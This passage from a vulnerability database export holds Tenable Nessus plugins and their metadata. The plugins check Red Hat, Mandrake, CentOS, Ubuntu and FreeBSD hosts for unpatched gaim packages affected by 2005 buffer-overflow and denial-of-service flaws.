script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x / 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2005:429\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"gaim-1.2.1-6.el3\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"gaim-1.2.1-6.el4\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gaim\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:43:55", "references": [], "pluginID": "18275", "description": "More vulnerabilities have been found in the gaim instant messaging client. A stack-based buffer overflow bug was found in how gaim processes a message containing a URL; a remote attacker could send a carefully crafted message to cause the execution of arbitrary code on the user's machine (CVE-2005-1261).\n\nAnother bug was found in how gaim handles malformed MSN messages; an attacker could send a carefully crafted MSN message that would cause gaim to crash (CVE-2005-1262).\n\nGaim version 1.3.0 fixes these issues and is provided with this update.", "edition": 5, "reporter": "Tenable", "published": "2005-05-17T00:00:00", "title": "Mandrake Linux Security Advisory : gaim (MDKSA-2005:086)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Mandriva Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1262", "CVE-2005-1261"], "modified": "2018-07-19T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:gaim-silc", "p-cpe:/a:mandriva:linux:gaim-tcl", "p-cpe:/a:mandriva:linux:lib64gaim-remote0-devel", "cpe:/o:mandrakesoft:mandrake_linux:10.1", "p-cpe:/a:mandriva:linux:gaim", "p-cpe:/a:mandriva:linux:lib64gaim-remote0", "p-cpe:/a:mandriva:linux:libgaim-remote0-devel", "p-cpe:/a:mandriva:linux:libgaim-remote0", "p-cpe:/a:mandriva:linux:gaim-perl", "x-cpe:/o:mandrakesoft:mandrake_linux:le2005", "p-cpe:/a:mandriva:linux:gaim-gevolution", "p-cpe:/a:mandriva:linux:gaim-devel"], "id": "MANDRAKE_MDKSA-2005-086.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=18275", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2005:086. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(18275);\n script_version (\"1.14\");\n script_cvs_date(\"Date: 2018/07/19 20:59:13\");\n\n script_cve_id(\"CVE-2005-1261\", \"CVE-2005-1262\");\n script_xref(name:\"MDKSA\", value:\"2005:086\");\n\n script_name(english:\"Mandrake Linux Security Advisory : gaim (MDKSA-2005:086)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"More vulnerabilities have been found in the gaim instant messaging\nclient. A stack-based buffer overflow bug was found in how gaim\nprocesses a message containing a URL; a remote attacker could send a\ncarefully crafted message to cause the execution of arbitrary code on\nthe user's machine (CVE-2005-1261).\n\nAnother bug was found in how gaim handles malformed MSN messages; an\nattacker could send a carefully crafted MSN message that would cause\ngaim to crash (CVE-2005-1262).\n\nGaim version 1.3.0 fixes these issues and is provided with this\nupdate.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:gaim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:gaim-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:gaim-gevolution\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:gaim-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:gaim-silc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:gaim-tcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64gaim-remote0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64gaim-remote0-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libgaim-remote0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libgaim-remote0-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:mandrakesoft:mandrake_linux:le2005\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/05/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK10.1\", reference:\"gaim-1.3.0-0.1.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"gaim-devel-1.3.0-0.1.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"gaim-gevolution-1.3.0-0.1.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"gaim-perl-1.3.0-0.1.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"gaim-tcl-1.3.0-0.1.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", cpu:\"x86_64\", reference:\"lib64gaim-remote0-1.3.0-0.1.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", cpu:\"x86_64\", reference:\"lib64gaim-remote0-devel-1.3.0-0.1.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", cpu:\"i386\", reference:\"libgaim-remote0-1.3.0-0.1.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", cpu:\"i386\", reference:\"libgaim-remote0-devel-1.3.0-0.1.101mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK10.2\", reference:\"gaim-1.3.0-0.1.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"gaim-devel-1.3.0-0.1.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"gaim-gevolution-1.3.0-0.1.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"gaim-perl-1.3.0-0.1.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"gaim-silc-1.3.0-0.1.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"gaim-tcl-1.3.0-0.1.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", cpu:\"x86_64\", reference:\"lib64gaim-remote0-1.3.0-0.1.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", cpu:\"x86_64\", reference:\"lib64gaim-remote0-devel-1.3.0-0.1.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", cpu:\"i386\", reference:\"libgaim-remote0-1.3.0-0.1.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", cpu:\"i386\", reference:\"libgaim-remote0-devel-1.3.0-0.1.102mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-11-11T12:47:24", "references": ["http://www.nessus.org/u?95675114", "http://www.nessus.org/u?a85c8e3a", "http://www.nessus.org/u?5228d669", "http://www.nessus.org/u?74a24dfa", "http://www.nessus.org/u?185a72d4", "http://www.nessus.org/u?abb700dc"], "pluginID": "21825", "description": "An updated gaim package that fixes two security issues is now available.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nThe Gaim application is a multi-protocol instant messaging client.\n\nA stack based buffer overflow bug was found in the way gaim processes a message containing a URL. A remote attacker could send a carefully crafted message resulting in the execution of arbitrary code on a victim's machine. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2005-1261 to this issue.\n\nA bug was found in the way gaim handles malformed MSN messages. A remote attacker could send a carefully crafted MSN message causing gaim to crash. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2005-1262 to this issue.\n\nUsers of Gaim are advised to upgrade to this updated package which contains backported patches and is not vulnerable to these issues.", "edition": 7, "reporter": "Tenable", "published": "2006-07-03T00:00:00", "title": "CentOS 3 / 4 : gaim (CESA-2005:429)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1262", "CVE-2005-1261"], "modified": "2018-11-10T00:00:00", "cpe": ["cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:gaim", "cpe:/o:centos:centos:3"], "id": "CENTOS_RHSA-2005-429.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=21825", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2005:429 and \n# CentOS Errata and Security Advisory 2005:429 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21825);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/11/10 11:49:27\");\n\n script_cve_id(\"CVE-2005-1261\", \"CVE-2005-1262\");\n script_xref(name:\"RHSA\", value:\"2005:429\");\n\n script_name(english:\"CentOS 3 / 4 : gaim (CESA-2005:429)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated gaim package that fixes two security issues is now\navailable.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe Gaim application is a multi-protocol instant messaging client.\n\nA stack based buffer overflow bug was found in the way gaim processes\na message containing a URL. A remote attacker could send a carefully\ncrafted message resulting in the execution of arbitrary code on a\nvictim's machine. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2005-1261 to this issue.\n\nA bug was found in the way gaim handles malformed MSN messages. A\nremote attacker could send a carefully crafted MSN message causing\ngaim to crash. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2005-1262 to this issue.\n\nUsers of Gaim are advised to upgrade to this updated package which\ncontains backported patches and is not vulnerable to these issues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-May/011639.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5228d669\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-May/011640.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?185a72d4\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-May/011641.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?74a24dfa\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-May/011647.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?abb700dc\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-May/011652.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?95675114\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-May/011653.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a85c8e3a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected gaim package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gaim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/07/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-3\", reference:\"gaim-1.2.1-6.el3\")) flag++;\n\nif (rpm_check(release:\"CentOS-4\", reference:\"gaim-1.2.1-6.el4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:50:30", "references": [], "pluginID": "20515", "description": "Marco Alvarez found a Denial of Service vulnerability in the Jabber protocol handler. A remote attacker could exploit this to crash Gaim by sending specially crafted file transfers to the user.\n(CAN-2005-0967)\n\nStu Tomlinson discovered an insufficient bounds checking flaw in the URL parser. By sending a message containing a very long URL, a remote attacker could crash Gaim or execute arbitrary code with the privileges of the user. This was not possible on all protocols, due to message length restrictions. Jabber are SILC were known to be vulnerable. (CAN-2005-1261)\n\nSiebe Tolsma discovered a Denial of Service attack in the MSN handler.\nBy sending a specially crafted SLP message with an empty body, a remote attacker could crash Gaim. (CAN-2005-1262).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 5, "reporter": "Tenable", "published": "2006-01-15T00:00:00", "title": "Ubuntu 4.10 / 5.04 : gaim vulnerabilities (USN-125-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0967", "CVE-2005-1262", "CVE-2005-1261"], "modified": "2018-07-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:gaim-dev", "p-cpe:/a:canonical:ubuntu_linux:gaim-data", "cpe:/o:canonical:ubuntu_linux:5.04", "cpe:/o:canonical:ubuntu_linux:4.10", "p-cpe:/a:canonical:ubuntu_linux:gaim"], "id": "UBUNTU_USN-125-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=20515", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-125-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20515);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/07/19 23:44:03\");\n\n script_cve_id(\"CVE-2005-0967\", \"CVE-2005-1261\", \"CVE-2005-1262\");\n script_xref(name:\"USN\", value:\"125-1\");\n\n script_name(english:\"Ubuntu 4.10 / 5.04 : gaim vulnerabilities (USN-125-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Marco Alvarez found a Denial of Service vulnerability in the Jabber\nprotocol handler. A remote attacker could exploit this to crash Gaim\nby sending specially crafted file transfers to the user.\n(CAN-2005-0967)\n\nStu Tomlinson discovered an insufficient bounds checking flaw in the\nURL parser. By sending a message containing a very long URL, a remote\nattacker could crash Gaim or execute arbitrary code with the\nprivileges of the user. This was not possible on all protocols, due to\nmessage length restrictions. Jabber are SILC were known to be\nvulnerable. (CAN-2005-1261)\n\nSiebe Tolsma discovered a Denial of Service attack in the MSN handler.\nBy sending a specially crafted SLP message with an empty body, a\nremote attacker could crash Gaim. (CAN-2005-1262).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected gaim, gaim-data and / or gaim-dev packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:gaim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:gaim-data\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:gaim-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:4.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.04\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/01/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2005-2018 Canonical, Inc. / NASL script (C) 2006-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(4\\.10|5\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 4.10 / 5.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"4.10\", pkgname:\"gaim\", pkgver:\"1.0.0-1ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"gaim\", pkgver:\"1.1.4-1ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"gaim-data\", pkgver:\"1.1.4-1ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"gaim-dev\", pkgver:\"1.1.4-1ubuntu4.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gaim / gaim-data / gaim-dev\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:07:28", "references": ["http://gaim.sourceforge.net/security/index.php?id=16", "http://www.nessus.org/u?57caa0c6"], "pluginID": "19017", "description": "The GAIM team reports that GAIM is vulnerable to a denial-of-service vulnerability which can cause GAIM to crash :\n\nIt is possible for a remote user to overflow a static buffer by sending an IM containing a very large URL (greater than 8192 bytes) to the Gaim user. This is not possible on all protocols, due to message length restrictions. Jabber are SILC are known to be vulnerable.", "edition": 4, "reporter": "Tenable", "published": "2005-07-13T00:00:00", "title": "FreeBSD : gaim -- remote crash on some protocols (889061af-c427-11d9-ac59-02061b08fc24)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1261"], "modified": "2013-06-22T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:ko-gaim", "p-cpe:/a:freebsd:freebsd:gaim", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:ja-gaim", "p-cpe:/a:freebsd:freebsd:ru-gaim"], "id": "FREEBSD_PKG_889061AFC42711D9AC5902061B08FC24.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=19017", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2013 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(19017);\n script_version(\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2013/06/22 00:02:01 $\");\n\n script_cve_id(\"CVE-2005-1261\");\n\n script_name(english:\"FreeBSD : gaim -- remote crash on some protocols (889061af-c427-11d9-ac59-02061b08fc24)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The GAIM team reports that GAIM is vulnerable to a denial-of-service\nvulnerability which can cause GAIM to crash :\n\nIt is possible for a remote user to overflow a static buffer by\nsending an IM containing a very large URL (greater than 8192 bytes) to\nthe Gaim user. This is not possible on all protocols, due to message\nlength restrictions. Jabber are SILC are known to be vulnerable.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://gaim.sourceforge.net/security/index.php?id=16\"\n );\n # http://www.freebsd.org/ports/portaudit/889061af-c427-11d9-ac59-02061b08fc24.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?57caa0c6\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:gaim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ja-gaim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ko-gaim\");\n script_set_attribute(attribute:\"cpe\", 